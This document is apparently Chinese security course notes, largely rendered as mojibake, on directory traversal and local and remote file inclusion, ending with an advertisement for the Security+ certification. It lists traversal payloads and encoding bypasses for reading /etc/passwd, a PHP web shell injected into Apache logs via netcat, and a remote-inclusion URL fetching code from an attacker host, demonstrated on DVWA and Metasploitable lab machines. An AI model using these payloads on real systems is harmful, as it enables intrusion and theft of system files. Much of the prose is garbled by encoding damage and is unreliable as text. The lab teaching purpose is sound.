æå¨æ¼æ´ææ
Directory travarsal / File include(æåºå«/没åºå«)
  ç®å½æééå¶ä¸ä¸¥ / æ件å å«
/etc/php5/cgi/php.ini
  allow_url_include = on
åºç¨ç¨åºåè½æä½æ件ï¼éå¶ä¸ä¸¥æ¶å¯¼è´è®¿é®WEBç®å½ä»¥å¤çæ件
  读ãåæ件ãè¿ç¨æ§è¡ä»£ç
ç¹å¾ä½ä¸ç»å¯¹
  ?page=a.php
  ?home=b.html
  ?file=content
[email protected]:~$ ifconfig
[email protected]:~$ sudo vi /etc/php5/cgi/php.ini
allow_url_include = ON
[email protected]:~$ sudo /etc/init.d/apache2 restart
æå¨æ¼æ´ææ
ç»å ¸æµè¯æ¹æ³
  ?file=../../../../etc/passwd
  ?page=file:///etc/passwd
  ?home=main.cgi
  ?page=http://www.a.com/1.php
  http://1.1.1.1/../../../../dir/file.txt
ç¼ç ç»è¿å符è¿æ»¤
  "."  "%00"    #ç»è¿æ件æ©å±åè¿æ»¤
    file=a.doc%00.php
  使ç¨å¤ç§ç¼ç å°è¯
[email protected]:~# pwd
[email protected]:~# cd .            //å½åç®å½
[email protected]:~# cd ../../         //æ ¹ç®å½
[email protected]:~# cd ../../../../      //è·³å°æ ¹ç®å½
æå¨æ¼æ´ææ
ä¸åæä½ç³»ç»çè·¯å¾ç¹å¾å符
  类unixç³»ç»
Â Â Â Â æ ¹ç®å½: /
    ç®å½å±çº§åé符: /
  Windowsç³»ç»
    C:\
    \ æ /
æå¨æ¼æ´ææ
  urlç¼ç ãåå±urlç¼ç
    %2e%2e%2f    解ç : ../
    %2e%2e%5c    解ç : ..\
    %252e%252e%255c 解ç : ..\
  Unicode/UTF-8ç¼ç
    ..%c0%af     解ç : ../
    ..%u2216
    ..%c1%9c     解ç : ..\
æå¨æ¼æ´ææ
å ¶ä»ç³»ç»è·¯å¾å¯è½ä½¿ç¨å°çå符
  file.txt....
  file.txt<spaces>
  file.txt""""
  file.txt<<<>>><
  ./././file.txt
  nonexistant/../file.txt
UNCè·¯å¾
  \\1.1.1.1\path\to\file.txt
[email protected]:~# cd a
[email protected]:~# cd a/../a.txt
æå·¥æ¼æ´ææ
代ç <?php
   $template = 'blue.php'
   if ( is_set( $_COOKIE['TEMPLATE'] ) )
     $template = $_COOKIE['TEMPLATE'];
   include ( "/home/users/phpguru/templates/" . $template );
   ?>
æ»å» GET /vulnerable.php HTTP/1.0\
   Cookie: TEMPLATE=../../../../../../../../../etc/passwd
ç»æ HTTP/1.0 200 OK
   Content-Type: text/html
   Server:Apache
   root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
   daemon:*:1:1::/tmp:
   phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
æå¨æ¼æ´ææ
æ¬å°æ件å å«lfi
  æ¥çæ件
  代ç æ§è¡
    <?php echo shell_exec($_GET['cmd']);?>
    Apache access.log
è¿ç¨æ件å å«rfi
  åºç°æ¦çå°äºlfiï¼ä½æ´å®¹æ被å©ç¨
[email protected]:~$ cd /var/log/apache2/
[email protected]:~/var/log/apache2$ cat access.log
[email protected]:~# nc 192.168.1.118 80
<?php echo shell_exec($_GET['cmd']);?>
HTTP/1.1 400 Bad Request
Date: Mon, 18 jan 2016 12:19:29 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
Content-Length: 323
Contetion: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML_ PUBLIC "-//IEIF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</hl>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at metasploitable.localdomain Port 80</address>
</body></html>
[email protected]:~/var/log/apache2$ ls -l access.log
[email protected]:~/var/log/apache2$ cd ..
[email protected]:~/var/log$ sudo chmod a+xr apache2/
[email protected]:~/var/log$ ls -ld apache2/
[email protected]:~/var/log$ cd ..
[email protected]:~/var$ ls -ld log
[email protected]:~/var$ cd ..
[email protected]:~$ ls -ld var/
[email protected]:~$ cd /var/log/apache2/
[email protected]:~/var/log/apache2$ cat access.log
192.168.1.168/dvwa/vulnerablities/fi/?page=http://192.168.1.119/a.php
[email protected]:~# nc -nclp 80
listening on [any] 80 ...
connect to [192.168.1.119 from (UNKNOWN) [192.168.1.118] 52612
GET /a.php HTTP/1.0
Host: 192.168.1.119
--------------------------------------------------------------------
<?php
  $file = $_GET['page']; //The page we wish to display
?>
----------------------------------------------------------------------
?php
  $file = $_GET['page']; //The page we wish to display
  // Only allow include.php
  if ( $file != "include.php" ) {
    echo "ERROR: File not found!";
    exit;
   }
?>
?>
该ç¬è®°ä¸ºå®å ¨ç课å å¦åç¬è®°ï¼æ³çæ¤è¯¾ç¨æè ä¿¡æ¯å®å ¨ç±»å¹²è´§å¯ä»¥ç§»æ¥å°å®å ¨ç课å
Security+认è¯ä¸ºä»ä¹æ¯äºèç½+æ¶ä»£æç«çç认è¯ï¼
    ç妹å ç»å¤§å®¶ä»ç»ä¸ä¸Security+
    Security+ 认è¯æ¯ä¸ç§ä¸ç«ç¬¬ä¸æ¹è®¤è¯ï¼å ¶åè¯æºæ为ç¾å½è®¡ç®æºè¡ä¸åä¼CompTIA ï¼æ¯åCISSPãITIL çå ±åå å«å¨å çå½é IT ä¸ 10 大çé¨è®¤è¯ä¹ä¸ï¼åCISSPåéä¿¡æ¯å®å ¨ç®¡çç¸æ¯ï¼Security+ 认è¯æ´åéä¿¡æ¯å®å ¨ææ¯åæä½ã
    éè¿è¯¥è®¤è¯è¯æäºæ¨å ·å¤ç½ç»å®å ¨ï¼åè§æ§åæä½å®å ¨ï¼å¨èåæ¼æ´ï¼åºç¨ç¨åºãæ°æ®å主æºå®å ¨ï¼è®¿é®æ§å¶å身份管ç以åå å¯ææ¯çæ¹é¢çè½åãå å ¶èè¯é¾åº¦ä¸æï¼å«ééè¾é«ï¼ç®åå·²è¢«å ¨çä¼ä¸åå®å ¨ä¸ä¸äººå£«ææ®éé纳ã
Security+认è¯å¦æ¤ç«ççåå ï¼Â Â
    åå ä¸ï¼å¨ææä¿¡æ¯å®å ¨è®¤è¯å½ä¸ï¼åéä¿¡æ¯å®å ¨ææ¯ç认è¯æ¯ç©ºç½çï¼Â Security+认è¯æ£å¥½å¯ä»¥å¼¥è¡¥ä¿¡æ¯å®å ¨ææ¯é¢åçç©ºç½ ã
    ç®åè¡ä¸å å认å¯çä¿¡æ¯å®å ¨è®¤è¯ä¸»è¦æCISPåCISSPï¼ä½æ¯æ 论CISPè¿æ¯CISSPé½æ¯åéä¿¡æ¯å®å ¨ç®¡ççï¼ææ¯ç¥è¯è®²ç宽æ³ä¸æµ æ¾ï¼èè¯é½æ¯ä¸å¸¦èè¿ãèä¸CISSPè¦æ±æè¯äººåçä¿¡æ¯å®å ¨å·¥ä½ç»éªé½è¦5年以ä¸ï¼CISPä¹è¦æ±å¤§ä¸å¦å4年以ä¸å·¥ä½ç»éªï¼è¿äºè¦æ±æ çææè½åä¸ä¸è¿ç年轻人çæè¯ä¹è·¯å µä½ãå¨ç°å®ç¤¾ä¼ä¸ï¼æ 论æ¯æ¾å·¥ä½è¿æ¯åèå èªï¼ææ¯ææ æ¶åæ¥äººåï¼è®¤è¯é½æ¯å¿ ä¸å¯å°çï¼è¿ç»å¹´è½»äººå¸¦æ¥äºå¾å¤ä¸å ¬å¹³ãèSecurity+çåºç°å¯ä»¥æ«æ¸ è¿äºå¹´è½»äººèä¸åå±ä¸çéç¢ï¼ç±äºSecurity+åéä¿¡æ¯å®å ¨ææ¯ï¼æ以对工ä½ç»éªæ²¡æç¹å«çè¦æ±ãåªè¦ä½ æITç¸å ³èæ¯ï¼è¿½æ±è¿æ¥å°±å¯ä»¥å¦ä¹ åèè¯ã
     åå äºï¼Â ITè¿ç»´äººåå·¥ä½ä¸ç¿»èº«çå©å¨ã
     å¨é¶è¡ãè¯å¸ãä¿é©ãä¿¡æ¯é讯çè¡ä¸ï¼ITè¿ç»´äººåé常å¤ï¼ITè¿ç»´æ¶åçå·¥ä½é¢ä¹é常广ãæ¯ä¸ä¸ªéç½ç»ãç³»ç»ãå®å ¨ãåºç¨æ¶æãåå¨ä¸ºä¸ä½ç综åæ§ææ¯å²ãè½ç¶æ²¡æç¨åºç¿ä»¬âçå½åå æ£ï¼æ»äº¦å代ç âçæ²å£®ï¼ä½ä¹æçâé禾æ¥å½åï¼ä¸å¦è¿ç»´è¦âçææ ¨ã天天对ççµèåæºå¨ï¼æ¶é´é¿äºé¾å æ对äºèä¸åå±çè¿·è«åå°æãSecurity+å½é 认è¯çåºç°å¯ä»¥è®©æ追æ±çITè¿ç»´äººåå¦ä¹ ç½ç»å®å ¨ç¥è¯ï¼ææ¡ç½ç»å®å ¨å®è·µãèä¸åå±æçç½ç»å®å ¨çæ¹ååå±ï¼è§£å³å½å ä¿¡æ¯å®å ¨äººæçå®ä¹é®é¢ãå¦å¤ï¼å³ä½¿ä¸è½¬åï¼è¦å好è¿ç»´å·¥ä½ï¼å¦ä¹ å®å ¨ç¥è¯åå¾å®å ¨è®¤è¯ä¹æ¯å¿ ä¸å¯å°çã
    åå ä¸ï¼æ¥å°æ°ãå½é èå¿ãèè¯æ¹ä¾¿ãè´¹ç¨éä¸ï¼
CompTIAä½ä¸ºå ¨çICTé¢åæå ·å½±ååçå ¨çé¢å æºæ,å¨ä¿¡æ¯å®å ¨äººæ认è¯æ¹é¢æ¯ä¸ä¸ãå ¬å¹³ãå ¬æ£çãSecurity+认è¯åéæä½ä¸åä¸çº¿å·¥ç¨å¸çæ¥å¸¸å·¥ä½æ¯æ¯ç¸å ³ãéåé¶è¡ãè¯å¸ãä¿é©ãäºèç½å ¬å¸çITç¸å ³äººåå¦ä¹ ãä½ä¸ºå½é 认è¯å¨å ¨ç147个å½å®¶åå°å¹¿æ³ç认å¯ã
    å¨ç®åçä¿¡æ¯å®å ¨å¤§æ½®ä¹ä¸ï¼äººææ¯ä¿¡æ¯å®å ¨åå±çå ³é®ãèç®åå½å çä¿¡æ¯å®å ¨äººææ¯é常å®ä¹çï¼ç¸ä¿¡Security+认è¯ä¸å®ä¼æ为æç«ççä¿¡æ¯å®å ¨è®¤è¯ã